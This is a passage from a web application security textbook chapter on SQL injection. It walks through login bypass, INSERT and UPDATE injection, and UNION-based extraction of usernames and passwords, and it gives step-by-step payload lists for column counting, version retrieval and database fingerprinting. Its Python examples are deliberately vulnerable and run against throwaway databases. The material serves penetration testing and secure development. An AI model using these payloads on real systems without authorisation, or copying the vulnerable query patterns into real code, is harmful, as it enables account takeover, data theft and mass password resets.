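    return "SELECT author,title,year FROM books WHERE publisher = '" + publisher + "'"


def search(conn: sqlite3.Connection, publisher: str) -> list:
    return conn.execute(build_query(publisher)).fetchall()


conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE books (author TEXT, title TEXT, year INTEGER, publisher TEXT)")
conn.executemany(
    "INSERT INTO books VALUES (?, ?, ?, ?)",
    [
        ("Author A", "Title A", 2005, "Wiley"),        # made-up sample rows
        ("Author B", "Title B", 2006, "Publisher B"),
    ],
)

print(build_query("O'Reilly"))
print(search(conn, "Wiley"))      # the intended use works as expected
try:
    search(conn, "O'Reilly")      # the apostrophe terminates the string early
except sqlite3.OperationalError as err:
    print("database error:", err)
```

The search for Wiley succeeds, whereas the apostrophe in the second search term ends the quoted string prematurely and the database rejects the resulting statement.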

When an application behaves in this way, it is wide open to SQL injection.

An attacker can supply input containing a quotation mark to terminate the

string that he controls, and can then write arbitrary SQL to modify the query

that the developer intended the application to execute. In this situation, for

example, the attacker can modify the query to return every single book in the

retailer’s catalog, by entering the search term:

Wiley' OR 1=1--

This causes the application to perform the following query:

SELECT author,title,year FROM books WHERE publisher = 'Wiley' OR 1=1--'

This modifies the WHERE clause of the developer’s query to add a second con-

dition. The database will check every row within the books table and extract

each record where the publisher column has the value Wiley or where 1 is

equal to 1. Because 1 is always equal to 1, the database will return every record

within the books table.

NOTE In the example shown, the double hyphen in the attacker’s input is a

meaningful expression in SQL that tells the query interpreter that the remainder

of the line is a comment and should be ignored. This trick is extremely useful in

some SQL injection attacks, because it enables you to ignore the remainder of

the query created by the application developer. In the example, the application

is encapsulating the user-supplied string in single quotation marks. Because

the attacker has terminated the string he controls and injected some additional

SQL, he needs to handle the trailing quotation mark, to avoid a syntax error

occurring as in the O’Reilly example. He achieves this by adding a double

hyphen, causing the remainder of the query to be treated as a comment. In

MySQL, you will need to include a space after the double hyphen, or use a

hash character to specify a comment.

TIP In some situations, an alternative way to handle the trailing quotation

mark without using the comment symbol is to “balance the quotes” by

concluding the injected input with an item of string data that requires a trailing

quote to encapsulate it. For example, entering the search term

Wiley' OR 'a' = 'a

will result in the query

SELECT author,title,year FROM books WHERE publisher = 'Wiley' OR 'a' = 'a'

which is perfectly valid and achieves the same result as the 1 = 1 attack.
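Both ways of handling the trailing quotation mark can be tried out safely against a throwaway database. The following sketch again assumes Python's built-in `sqlite3` module, which accepts the double-hyphen comment used here, rather than Oracle, MS-SQL, or MySQL. The `search` function and the sample rows are hypothetical.

```python
import sqlite3


def search(conn: sqlite3.Connection, publisher: str) -> list:
    # Unsafe by design: user input is concatenated straight into the query.
    query = "SELECT author,title,year FROM books WHERE publisher = '" + publisher + "'"
    return conn.execute(query).fetchall()


conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE books (author TEXT, title TEXT, year INTEGER, publisher TEXT)")
conn.executemany(
    "INSERT INTO books VALUES (?, ?, ?, ?)",
    [
        ("Author A", "Title A", 2005, "Wiley"),        # made-up sample rows
        ("Author B", "Title B", 2006, "Publisher B"),
        ("Author C", "Title C", 2007, "Publisher C"),
    ],
)

legitimate = search(conn, "Wiley")
commented = search(conn, "Wiley' OR 1=1--")      # trailing quote is commented out
balanced = search(conn, "Wiley' OR 'a' = 'a")    # trailing quote closes the final string

print(len(legitimate), len(commented), len(balanced))
```

The legitimate search matches one row, while both injected search terms cause every row in the table to be returned.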

The previous example may appear to have little security impact, because

users can probably access all book details using entirely legitimate means.

However, we will describe shortly how many SQL injection flaws like this can

be used to extract arbitrary data from different database tables, and to escalate

privileges within the database and the database server. For this reason, any

SQL injection vulnerability should be regarded as extremely serious, regard-

less of its precise context within the application’s functionality.

Bypassing a Login

In some situations, a simple SQL injection vulnerability may have an immediately critical impact, regardless of any further attacks that could be built upon it. Many applications that implement a forms-based login function use a database to store user credentials and perform a simple SQL query to validate each login attempt. A typical example of this query is:

SELECT * FROM users WHERE username = 'marcus' and password = 'secret'

This query causes the database to check every row within the users table and extract each record where the username column has the value marcus and the password column has the value secret. If a user’s details are returned to the application, then the login attempt is successful, and the application creates an authenticated session for that user.

As with the search function, an attacker can inject into either the username or the password field to modify the query performed by the application, and so subvert its logic. For example, if an attacker knows that the username of the application administrator is admin, he can log in as that user by supplying any password and the following username:

admin'--

This causes the application to perform the following query:

SELECT * FROM users WHERE username = 'admin'--' AND password = 'foo'


which because of the comment symbol is equivalent to

SELECT * FROM users WHERE username = 'admin'

and so the password check has been bypassed altogether.

Suppose that the attacker does not know the username of the administrator.

In most applications, the first account in the database is an administrative user,

because this account is normally created manually and then used to generate

all other accounts via the application. Further, if the query returns the details

for more than one user, most applications will simply process the first user

whose details are returned. An attacker can often exploit this behavior to log in

as the first user in the database by supplying the username:

' OR 1=1--

This causes the application to perform the query

SELECT * FROM users WHERE username = '' OR 1=1--' AND password = 'foo'

which because of the comment symbol is equivalent to

SELECT * FROM users WHERE username = '' OR 1=1

which will return the details of all application users.
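The two login bypasses can be reproduced against a toy login routine. This is a minimal sketch under stated assumptions: the login function, the table layout, and the choice of SQLite are illustrative and not taken from any real application, and the routine processes only the first row returned, as the text describes.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
# The first account created is the administrator, as the text assumes.
conn.executemany("INSERT INTO users VALUES (?, ?)",
                 [("admin", "r00tr0x"), ("marcus", "secret")])

def login(username, password):
    """Return the logged-in username, or None if the login fails."""
    # Deliberately unsafe string concatenation.
    query = ("SELECT * FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    row = conn.execute(query).fetchone()  # only the first row is processed
    return row[0] if row else None

legitimate = login("marcus", "secret")      # correct credentials
rejected = login("marcus", "wrong")         # wrong password, no rows
as_admin = login("admin'--", "foo")         # password check commented out
as_first_user = login("' OR 1=1--", "foo")  # every row matches
```

In this sketch both injected usernames yield a session for admin, even though the attacker never supplies that account's password.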

Finding SQL Injection Bugs

In the most obvious cases, a SQL injection flaw may be discovered and con-

clusively verified by supplying a single item of unexpected input to the appli-

cation. In other cases, bugs may be extremely subtle and may be difficult to

distinguish from other categories of vulnerability or from benign anomalies

that do not present any security threat. Nevertheless, there are various steps

that you can carry out in an ordered way to reliably verify the majority of SQL

injection flaws.

NOTE In your application mapping exercises (see Chapter 4), you should have

identified instances where the application appears to be accessing a back-end

database, and all of these need to be probed for SQL injection flaws. In fact,

absolutely any item of data submitted to the server may be passed to database

functions in ways that are not evident from the user’s perspective and may be

handled in an unsafe manner. You therefore need to probe every such item for

SQL injection vulnerabilities. This includes all URL parameters, cookies, items of

POST data, and HTTP headers. In all cases, a vulnerability may exist in the

handling of both the name and value of the relevant parameter.


TIP When you are probing for SQL injection vulnerabilities, be sure to walk

through to completion any multistage processes in which you submit crafted

input. Applications frequently gather a collection of data across several

requests, and only persist this to the database once the complete set has been

gathered. In this situation, you will miss many SQL injection vulnerabilities if

you only submit crafted data within each individual request and monitor the

application’s response to that request.

String Data

When user-supplied string data is incorporated into an SQL query, it is encap-

sulated within single quotation marks. In order to exploit any SQL injection

flaw, you will need to break out of these quotation marks.

HACK STEPS

■ Submit a single quotation mark as the item of data you are targeting.

Observe whether an error occurs, or whether the result differs from

the original in any other way. If a detailed database error message is

received, consult the “SQL Syntax and Error Reference” section of this

chapter to understand its meaning.

■ If an error or other divergent behavior was observed, submit two single

quotation marks together. Databases use two single quotation marks as

an escape sequence to represent a literal single quote, so the sequence

is interpreted as data within the quoted string rather than the closing

string terminator. If this input causes the error or anomalous behavior to

disappear, then the application is probably vulnerable to SQL injection.

■ As a further verification that a bug is present, you can use SQL concate-

nator characters to construct a string that is equivalent to some benign

input. If the application handles your crafted input in the same way as it

does the corresponding benign input, then it is likely to be vulnerable.

Each type of database uses different methods for string concatenation.

The following examples can be injected to construct input that is equiva-

lent to FOO in a vulnerable application:

Oracle: '||'FOO

MS-SQL: '+'FOO

MySQL: ' 'FOO [note there is a space between the two quotes]
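The three probes in these steps can be tried against a deliberately vulnerable query. The sketch below is an illustration, not a testing tool. It assumes an in-memory SQLite database, which happens to share Oracle's || concatenation operator, and a hypothetical items table. The string "error" stands in for whatever error page or anomalous response a real application would return.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE items (name TEXT)")
conn.execute("INSERT INTO items VALUES ('FOO')")

def probe(value):
    """Run the vulnerable query; return its rows, or 'error' if it fails."""
    query = "SELECT name FROM items WHERE name = '" + value + "'"
    try:
        return conn.execute(query).fetchall()
    except sqlite3.Error:
        return "error"

results = {
    "benign": probe("FOO"),             # baseline response
    "single quote": probe("'"),         # unbalanced quote breaks the query
    "two quotes": probe("''"),          # escaped quote, query is valid again
    "concatenation": probe("'||'FOO"),  # ''||'FOO' evaluates to FOO
}
```

The pattern to look for is an error on the single quote, no error on the doubled quote, and a concatenation probe that behaves exactly like the benign input.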

TIP One way of confirming that the application is interacting with a back-end

database is to submit the SQL wildcard character % in a given parameter. For

example, submitting this in a search field often returns a large number of

results, indicating that the input is being passed into an SQL query. Of course,

this does not necessarily indicate that the application is vulnerable — only that

you should probe further to identify any actual flaws.


Numeric Data

When user-supplied numeric data is incorporated into an SQL query, the

application may still handle this as string data, by encapsulating it within sin-

gle quotation marks. You should, therefore, always perform the steps

described previously for string data. In most cases, however, numeric data is

passed directly to the database in numeric form and so is not placed within

single quotation marks. If none of the previous tests points towards the pres-

ence of a vulnerability, there are some other specific steps you can take in rela-

tion to numeric data.

HACK STEPS

■ Try supplying a simple mathematical expression that is equivalent to the

original numeric value. For example, if the original value was 2, try sub-

mitting 1+1 or 3-1. If the application responds in the same way, then it

may be vulnerable.

■ The preceding test is most reliable in cases where you have confirmed

that the item being modified has a noticeable effect on the application’s

behavior. For example, if the application uses a numeric PageID parame-

ter to specify which content should be returned, then substituting 1+1 for

2 with equivalent results is a good sign that SQL injection is present. If,

however, you can place completely arbitrary input into a numeric para-

meter without changing the application’s behavior, then the preceding

test provides no evidence of a vulnerability.

■ If the first test is successful, you can obtain further evidence of the vul-

nerability by using more complicated expressions which use SQL-specific

keywords and syntax. A good example of this is the ASCII command,

which returns the numeric ASCII code of the supplied character. For

example, because the ASCII value of A is 65, the following expression is

equivalent to 2 in SQL:

67-ASCII('A')

■ The previous test will not work if single quotes are being filtered; how-

ever in this situation you can exploit the fact that databases will implic-

itly convert numeric data to string data where required. Hence, because

the ASCII value of the character 1 is 49, the following expression is equiv-

alent to 2 in SQL:

51-ASCII(1)
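The numeric probes can be checked in the same way. The following sketch assumes a hypothetical pages table in an in-memory SQLite database and a query that places the parameter into the SQL without quotes. SQLite has no ASCII function, so its unicode() function is substituted here as the nearest equivalent; on Oracle, MS-SQL, or MySQL you would use ASCII as shown in the steps.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE pages (id INTEGER, body TEXT)")
conn.executemany("INSERT INTO pages VALUES (?, ?)",
                 [(1, "home"), (2, "about"), (3, "contact")])

def get_page(page_id):
    """Vulnerable lookup: the numeric parameter is not quoted or validated."""
    query = "SELECT body FROM pages WHERE id = " + page_id
    try:
        return conn.execute(query).fetchall()
    except sqlite3.Error:
        return "error"

baseline = get_page("2")
arithmetic = get_page("1+1")                 # evaluated by the database
keyword = get_page("67-unicode('A')")        # 67 - 65 = 2
no_quotes = get_page("51-unicode(1)")        # 1 is converted to '1', code 49
```

Each probe returns the same page as the literal value 2, which is only possible if the database is evaluating the supplied expression.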


TIP A common mistake made when probing an application for defects such

as SQL injection is to forget that certain characters have special meaning within

HTTP requests. If you wish to include these characters within your attack

payloads, then you must be careful to URL-encode them to ensure that they are

interpreted in the way you intend. In particular:

■ & and = are used to join together name/value pairs to create the query string and the block of POST data. You should encode them using %26 and %3d, respectively.

■ Literal spaces are not allowed in the query string, and if submitted will effectively terminate the entire string. You should encode them using + or %20.

■ Because + is used to encode spaces, if you wish to include an actual + in your string, you must encode it using %2b. In the previous numeric example, therefore, 1+1 should be submitted as 1%2b1.

■ The semicolon is used to separate cookie fields, and should be encoded using %3b.

These encodings are necessary whether you are editing the parameter’s value

directly from your browser, with an intercepting proxy, or through any other

means. If you fail to encode problem characters correctly, then you may

invalidate the entire request, or submit data that you did not intend to.
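If you script your requests, the encodings listed in this tip need not be done by hand. The sketch below uses Python's standard urllib.parse module; the sample strings are illustrative. Note that these functions emit uppercase hexadecimal digits (%2B rather than %2b), which is equivalent because percent-encoding is case-insensitive.

```python
from urllib.parse import quote, quote_plus

# safe="" tells quote() to encode every reserved character, including "/".
encoded_plus = quote("1+1", safe="")       # literal + must not become a space
encoded_pair = quote("a&b=c", safe="")     # & and = inside a value
encoded_semicolon = quote(";", safe="")    # cookie field separator
encoded_space = quote("a b", safe="")      # space as %20

# quote_plus() encodes spaces as + instead, the form-encoding convention.
encoded_space_plus = quote_plus("a b")
encoded_payload = quote_plus("' OR 1=1--")
```

The value of encoded_payload is the form in which the earlier login bypass string would need to be placed into a query string or POST body.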

The steps described previously are normally sufficient to identify the major-

ity of SQL injection vulnerabilities, including many of those where no useful

results or error information is transmitted back to the browser. In some cases,

however, more advanced techniques may be necessary, such as the use of time

delays to confirm the presence of a vulnerability. We will describe these tech-

niques later in this chapter.

Injecting into Different Statement Types

The SQL language contains a number of verbs that may appear at the beginning of statements. Because it is the most commonly used verb, the majority of SQL injection vulnerabilities arise within SELECT statements. Indeed, discussions about SQL injection often give the impression that the vulnerability only occurs in connection with SELECT statements, because the examples used are all of this type. However, SQL injection flaws can exist within any type of statement, and there are some important considerations that you need to be aware of in relation to each.


Of course, when you are interacting with a remote application, it is not nor-

mally possible to know in advance what type of statement a given item of user

input will be processed by. However, you can usually make an educated guess

based upon the type of application function you are dealing with. The most

common types of SQL statements and their uses are described here.

SELECT Statements

SELECT statements are used to retrieve information from the database. They

are frequently employed in functions where the application returns informa-

tion in response to user actions, such as browsing a product catalog, viewing a

user’s profile, or performing a search. They are also often used in login func-

tions where user-supplied information is checked against data retrieved from

a database.

As in the previous examples, the entry point for SQL injection attacks is normally the WHERE clause of the query, in which user-supplied items are passed to the database to control the scope of the query’s results. Because the WHERE clause is usually the final component of a SELECT statement, this enables the attacker to use the comment symbol to truncate the query to the end of his input without invalidating the syntax of the overall query.

Occasionally, SQL injection vulnerabilities occur that affect other parts of the

SELECT query, such as the ORDER BY clause or the names of tables and columns.

INSERT Statements

INSERT statements are used to create a new row of data within a table. They are

commonly used when an application adds a new entry to an audit log, creates

a new user account, or generates a new order.

For example, an application may allow users to self-register, specifying their own username and password, and may then insert the details into the users table with the following statement:

INSERT INTO users (username, password, ID, privs) VALUES ('daf', 'secret', 2248, 1)

If the username or password field is vulnerable to SQL injection, then an attacker can insert arbitrary data into the table, including his own values for ID and privs. However, to do so he must ensure that the remainder of the VALUES clause is completed gracefully. In particular, it must contain the correct number of data items of the correct types. For example, injecting into the username field, the attacker can supply the following:

foo', 'bar', 9999, 0)--


which will create an account with ID of 9999 and privs of 0. Assuming that the

privs field is used to determine account privileges, this may enable the

attacker to create an administrative user.
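The effect of this input on the stored row can be observed with a small reproduction. The sketch below is an assumption-laden illustration: the register function and its fixed ID of 2248 are hypothetical, and an in-memory SQLite database stands in for the application's real database.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE users (username TEXT, password TEXT, ID INTEGER, privs INTEGER)")

def register(username, password):
    # Deliberately vulnerable: the application intends to fix ID and privs itself.
    query = ("INSERT INTO users (username, password, ID, privs) VALUES ('"
             + username + "', '" + password + "', 2248, 1)")
    conn.execute(query)

register("daf", "secret")                      # normal registration
register("foo', 'bar', 9999, 0)--", "ignored")  # attacker completes VALUES himself

rows = conn.execute(
    "SELECT username, password, ID, privs FROM users ORDER BY ID").fetchall()
```

The second row carries the attacker's chosen ID and privs values, and the password typed into the form is discarded because it falls inside the comment.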

In some situations, when working completely blind, injecting into an INSERT statement may enable an attacker to extract string data from the application. For example, the attacker could grab the version string of the database and insert this into a field within his own user profile, which can be displayed back to his browser in the normal way.

TIP When attempting to inject into an INSERT statement, you may not know

in advance how many parameters are required, or what their types are. In the

preceding situation, you can keep adding additional fields to the VALUES clause

until the desired user account is actually created. For example, when injecting

into the username field, you could submit the following:

foo')--

foo', 1)--

foo', 1, 1)--

foo', 1, 1, 1)--

Because most databases will implicitly cast an integer to a string, an integer

value can be used at each position — in this case resulting in an account with a

username of foo and a password of 1, regardless of which order the other

fields are in.

If you find that the value 1 is still rejected, you can try the value 2000, which

many databases will also implicitly cast to date-based data types.
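The process of adding fields until the INSERT succeeds is easy to automate. The following sketch assumes the same hypothetical four-column users table as the example statement, held in an in-memory SQLite database, and treats any database error as a failed attempt. Against a real application you would instead have to infer success from the response, for example by attempting to log in as foo.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE users (username TEXT, password TEXT, ID INTEGER, privs INTEGER)")

def register(username, password="x"):
    """Vulnerable registration; returns True if the INSERT succeeded."""
    query = ("INSERT INTO users (username, password, ID, privs) VALUES ('"
             + username + "', '" + password + "', 2248, 1)")
    try:
        conn.execute(query)
        return True
    except sqlite3.Error:
        return False

def find_field_count(max_fields=10):
    """Try foo')--, then foo', 1)--, and so on until one is accepted."""
    for extra in range(max_fields):
        payload = "foo'" + ", 1" * extra + ")--"
        if register(payload):
            return extra + 1, payload
    return None

field_count, working_payload = find_field_count()
created = conn.execute("SELECT username, password FROM users").fetchall()
```

Here the fourth attempt succeeds, and the integer 1 supplied in the password position is stored as the string 1, matching the behavior described in the tip.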

UPDATE Statements

UPDATE statements are used to modify one or more existing rows of data within

a table. They are often used in functions where a user changes the value of data

that already exists — for example, updating her contact information, changing

her password, or changing the quantity on a line of an order.

A typical UPDATE statement works in a similar way to an INSERT statement, except that it usually contains a WHERE clause to tell the database which rows of the table to update. For example, when a user changes her password, the application might perform the following query:

UPDATE users SET password='newsecret' WHERE user = 'marcus' and password = 'secret'

This query in effect verifies that the user’s existing password is correct and, if so, updates it with the new value. If the function is vulnerable to SQL injection, then an attacker can bypass the existing password check and update the password of the admin user by entering the following username:

admin'--

NOTE Probing for SQL injection vulnerabilities in a remote application is

always potentially dangerous, because you have no way of knowing in advance

quite what action the application will perform using your crafted input. In

particular, modifying the WHERE clause in an UPDATE statement can cause

changes to be made throughout a critical table of the database. For example, if

the attack just described had instead supplied the username

admin' or 1=1--

then this would cause the application to execute the query

UPDATE users SET password='newsecret' WHERE user = 'admin' or 1=1

which resets the value of every user’s password!

Be aware that this risk exists even when you are attacking an application

function that does not appear to update any existing data, such as the main login function. In some cases, following a successful login, the application

performs various UPDATE queries using the supplied username, meaning that

any attack on the WHERE clause may be replicated in these other statements,

potentially wreaking havoc within the profiles of all application users. You

should ensure that the application owner accepts these unavoidable risks

before attempting to probe for or exploit any SQL injection flaws, and you

should also strongly encourage them to perform a full database backup

before you begin testing.
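The difference between the targeted attack and the destructive one is a single clause, which a disposable database makes plain. This sketch assumes a hypothetical change_password function and a three-row users table in an in-memory SQLite database; it reports how many rows each statement modified.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (user TEXT, password TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?)",
                 [("admin", "r00tr0x"), ("marcus", "secret"), ("cliff", "Reboot")])

def change_password(user, old_password, new_password):
    """Vulnerable password change; returns the number of rows updated."""
    query = ("UPDATE users SET password='" + new_password +
             "' WHERE user = '" + user +
             "' and password = '" + old_password + "'")
    return conn.execute(query).rowcount

# Targeted: only the admin row matches once the password check is removed.
targeted = change_password("admin'--", "wrong", "owned")

# Blanket: or 1=1 makes the WHERE clause true for every row in the table.
blanket = change_password("admin' or 1=1--", "wrong", "newsecret")

passwords = conn.execute("SELECT DISTINCT password FROM users").fetchall()
```

After the second call every account shares the same password, which is exactly the outcome the note warns against causing on a live system.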

DELETE Statements

DELETE statements are used to delete one or more rows of data within a table,

for example when users remove an item from their shopping basket or delete

a delivery address from their personal details.

As with UPDATE statements, a WHERE clause is normally used to tell the database which rows of the table to delete, and user-supplied data is most likely to be incorporated into this clause. Subverting the intended WHERE clause can have far-reaching effects, and the same caution described for UPDATE statements applies to this attack.

The UNION Operator

The UNION operator is used in SQL to combine the results of two or more SELECT statements into a single result set. When a web application contains a SQL injection vulnerability that occurs in a SELECT statement, you can often employ the UNION operator to perform a second, entirely separate query, and combine its results with those of the first. If the results of the query are returned to your browser, then this technique can be used to easily extract arbitrary data from within the database.

Recall the application that enabled users to search for books based on

author, title, publisher, and other criteria. Searching for books published by

Wiley causes the application to perform the following query:

SELECT author,title,year FROM books WHERE publisher = 'Wiley'

Suppose that this query returns the following set of results:

AUTHOR       TITLE                            YEAR
Litchfield   The Database Hacker’s Handbook   2005
Anley        The Shellcoder’s Handbook        2007

You saw earlier how an attacker could supply crafted input to the search function to subvert the WHERE clause of the query and so return all of the books held within the database. A far more interesting attack would be to use the UNION operator to inject a second SELECT query and append its results to those of the first. This second query can extract data from a different database table altogether. For example, entering the search term

Wiley' UNION SELECT username,password,uid FROM users--

will cause the application to perform the following query:

SELECT author,title,year FROM books WHERE publisher = 'Wiley'

UNION

SELECT username,password,uid FROM users--'

This returns the results of the original search followed by the contents of the

users table:

AUTHOR       TITLE                            YEAR
Litchfield   The Database Hacker’s Handbook   2005
Anley        The Shellcoder’s Handbook        2007
admin        r00tr0x                          0
cliff        Reboot                           1

NOTE When the results of two or more SELECT queries are combined using

the UNION operator, the column names of the combined result set are the same

as those returned by the first SELECT query. As shown in the preceding table,

usernames appear in the author column and passwords appear in the title

column. This means that when the application processes the results of the

modified query, it has no way of detecting that the data returned has originated

from a different table altogether.
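The UNION attack on the book search can be replayed end to end. The sketch below assumes the same vulnerable string concatenation as before and uses an in-memory SQLite database with the sample rows from the text. One difference to be aware of is that SQLite, like most databases, does not guarantee the order of rows in a UNION result, so the rows are compared here without regard to order.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE books (author TEXT, title TEXT, year INTEGER, publisher TEXT)")
conn.executemany("INSERT INTO books VALUES (?, ?, ?, ?)", [
    ("Litchfield", "The Database Hacker's Handbook", 2005, "Wiley"),
    ("Anley", "The Shellcoder's Handbook", 2007, "Wiley"),
])
conn.execute("CREATE TABLE users (username TEXT, password TEXT, uid INTEGER)")
conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                 [("admin", "r00tr0x", 0), ("cliff", "Reboot", 1)])

def search(publisher):
    """Vulnerable search; returns the result column names and the rows."""
    query = ("SELECT author,title,year FROM books WHERE publisher = '"
             + publisher + "'")
    cursor = conn.execute(query)
    columns = [description[0] for description in cursor.description]
    return columns, cursor.fetchall()

columns, rows = search("Wiley' UNION SELECT username,password,uid FROM users--")
```

The column names reported for the combined result are still author, title, and year, which is why the application cannot tell that two of the rows came from the users table.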

This simple example demonstrates the potentially huge power of the UNION

operator when employed in a SQL injection attack. However, before it can be

exploited in this way, two important provisos need to be considered:

■ When the results of two queries are combined using the UNION operator, the two result sets must have the same structure; that is, they must contain the same number of columns, which have the same or compatible data types, appearing in the same order.

■ In order to inject a second query that will return interesting results, the attacker needs to know the name of the database table that he wishes to target, and the names of its relevant columns.

Let’s look a little deeper at the first of these provisos. Suppose that the

attacker attempts to inject a second query which returns an incorrect number

of columns. He supplies the input

Wiley' UNION SELECT username,password FROM users--

The original query returns three columns, and the injected query only

returns two columns. Hence, the database returns the following error:

ORA-01789: query block has incorrect number of result columns

Suppose instead that the attacker attempts to inject a second query whose

columns have incompatible data types. He supplies the input

Wiley' UNION SELECT uid,username,password FROM users--

This causes the database to attempt to combine the password column from

the second query (which contains string data) with the year column from the

first query (which contains numeric data). Because string data cannot be con-

verted into numeric data, this causes an error:

ORA-01790: expression must have same datatype as corresponding expression

NOTE The error messages shown here are for Oracle. The equivalent

messages for other databases are listed in the “SQL Syntax and Error

Reference” section, later in this chapter.


In many real-world cases, the database error messages shown will be

trapped by the application and will not be returned to the user’s browser. It

may appear, therefore, that in attempting to discover the structure of the first

query, you are restricted to pure guesswork. However, this is not the case.

There are three important points that mean that your task is normally easy:

■ In order for the injected query to be capable of being combined with the first, it is not strictly necessary that it contain the same data types. Rather, they must be compatible; that is, each data type in the second query must either be identical to the corresponding type in the first or be implicitly convertible to it. You have already seen that databases will implicitly convert a numeric value to a string value. In fact, the value NULL can be converted to any data type. Hence, if you do not know the data type of a particular field, you can simply SELECT NULL for that field.

■ In cases where database error messages are trapped by the application, you can easily determine whether your injected query was executed. If it was, then additional results will be added to those returned by the application from its original query. This enables you to work systematically until you discover the structure of the query you need to inject.

■ In most cases, you can achieve your objectives simply by identifying a single field within the original query that has a string data type. This is sufficient for you to inject arbitrary queries that return string-based data and retrieve the results, enabling you to systematically extract any data from the database that you desire.

HACK STEPS

Your first task is to discover the number of columns returned by the original

query being executed by the application. There are two ways of achieving this:

■ You can exploit the fact that NULL is convertible to any data type to sys-

tematically inject queries with different numbers of columns, until your

injected query is executed, for example:

' UNION SELECT NULL--

' UNION SELECT NULL, NULL--

' UNION SELECT NULL, NULL, NULL--

When your query is executed, you have determined the number of

columns required. If database error messages are not being returned by

the application, you can still tell when your injected query was successful

because an additional row of data will be returned, containing either the

word NULL or an empty string.


■ You can inject an ORDER BY clause into the original query and increment

the index of the ordering column until an error occurs. For example:

' ORDER BY 1--

' ORDER BY 2--

' ORDER BY 3--

Typically, the first few cases will return the same results as the original query

but in different orders. When an error occurs, you have specified an invalid

column number, and so have discovered the number of actual columns.

Having identified the required number of columns, your next task is to

discover a column that has a string data type, so that you can use this to extract

arbitrary data from the database. You can achieve this by injecting a query

containing NULLs as you did previously, and systematically replacing each NULL

with 'a'. For example, if you know that the query must return three columns, you

can inject the following:

' UNION SELECT 'a', NULL, NULL--

' UNION SELECT NULL, 'a', NULL--

' UNION SELECT NULL, NULL, 'a'--

When your query is executed, you will see an additional row of data

containing the value a. You can then use the relevant column to extract data

from the database.
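Both column-counting methods lend themselves to a simple loop. The sketch below is a minimal illustration under stated assumptions: run_search is a hypothetical stand-in for sending a request to the vulnerable search function, a return value of None represents a trapped error, and the back end is an in-memory SQLite database. SQLite does not enforce column types in a UNION, so the follow-on step of locating a string column is not shown, because every position would accept 'a' there.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE books (author TEXT, title TEXT, year INTEGER, publisher TEXT)")
conn.execute(
    "INSERT INTO books VALUES ('Anley', 'The Shellcoder''s Handbook', 2007, 'Wiley')")

def run_search(term):
    """Vulnerable three-column search; None means the query raised an error."""
    query = ("SELECT author,title,year FROM books WHERE publisher = '"
             + term + "'")
    try:
        return conn.execute(query).fetchall()
    except sqlite3.Error:
        return None

def count_columns_with_nulls(max_columns=10):
    # Add one NULL at a time until the injected UNION query is accepted.
    for n in range(1, max_columns + 1):
        payload = "' UNION SELECT " + ", ".join(["NULL"] * n) + "--"
        if run_search(payload) is not None:
            return n
    return None

def count_columns_with_order_by(max_columns=10):
    # Raise the ORDER BY index until the database rejects it.
    for n in range(1, max_columns + 2):
        if run_search("' ORDER BY " + str(n) + "--") is None:
            return n - 1
    return None

null_count = count_columns_with_nulls()
order_by_count = count_columns_with_order_by()
```

Both functions arrive at the same answer for this query. The ORDER BY method typically needs fewer requests when the column count is large, because it lends itself to a binary search rather than a linear one.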

NOTE In Oracle databases, every SELECT statement must include a FROM

clause, and so injecting UNION SELECT NULL will produce an error

regardless of the number of columns. You can satisfy this requirement by

selecting from the globally accessible table DUAL. For example:

' UNION SELECT NULL FROM DUAL--

When you have identified the number of columns required in your injected

query, and have found a column which has a string data type, you are in a

position to extract arbitrary data. A simple proof-of-concept test is to extract

the version string of the database, which can be done on any DBMS. For exam-

ple, if there are three columns, and the first column can take string data, you

can extract the database version by injecting the following query on MS-SQL

and MySQL:

' UNION SELECT @@version,NULL,NULL--

Injecting the following query will achieve the same result on Oracle:

' UNION SELECT banner,NULL,NULL FROM v$version--

In the example of the vulnerable book search application, we can use this

string as a search term to retrieve the version of the Oracle database:

AUTHOR TITLE YEAR

CORE 9.2.0.1.0 Production

NLSRTL Version 9.2.0.1.0 - Production

Oracle9i Enterprise Edition Release 9.2.0.1.0 - Production

PL/SQL Release 9.2.0.1.0 - Production

TNS for 32-bit Windows: Version 9.2.0.1.0 - Production

Of course, while the database’s version string may be interesting, and may

enable you to research vulnerabilities in the specific software being used, in

most cases you will be more interested in extracting actual data from the data-

base. To do this, you will typically need to address the second proviso

described earlier; that is, you need to know the name of the database table that

you wish to target and the names of its relevant columns. We will describe

techniques you can employ to achieve this shortly.

Fingerprinting the Database

Most of the techniques described so far are effective against all of the common

database platforms, and any divergences have been accommodated through

minor adjustments to syntax. However, as we begin to look at more advanced

exploitation techniques, the differences between platforms become more sig-

nificant, and you will increasingly need to know which type of back-end data-

base you are dealing with.

You have already seen how you can extract the version string of the major

database types. Even if this cannot be done for some reason, it is usually pos-

sible to fingerprint the database using other methods. One of the most reliable

is the different means by which databases concatenate strings. In a query

where you control some item of string data, you can supply a particular value

in one request and then test different methods of concatenation to produce that

string. When the same results are obtained, you have probably identified the

type of database being used. The following examples show how the string

services could be constructed on the common types of database:

■ Oracle: 'serv'||'ices'

■ MS-SQL: 'serv'+'ices'

■ MySQL: 'serv' 'ices' [note the space]

If you are injecting into numeric data, then the following attack strings can

be used to fingerprint the database. Each of these items will evaluate to 0 on

the target database and generate an error on the other databases:

■ Oracle: BITAND(1,1)-BITAND(1,1)

■ MS-SQL: @@PACK_RECEIVED-@@PACK_RECEIVED

■ MySQL: CONNECTION_ID()-CONNECTION_ID()

NOTE The MS-SQL and Sybase databases share a common origin, so many

similarities exist in relation to table structure, global variables, and stored

procedures. In practice, the majority of the attack techniques against MS-SQL

described in later sections will work in an identical way against Sybase.

A further point of interest when fingerprinting databases is the way in

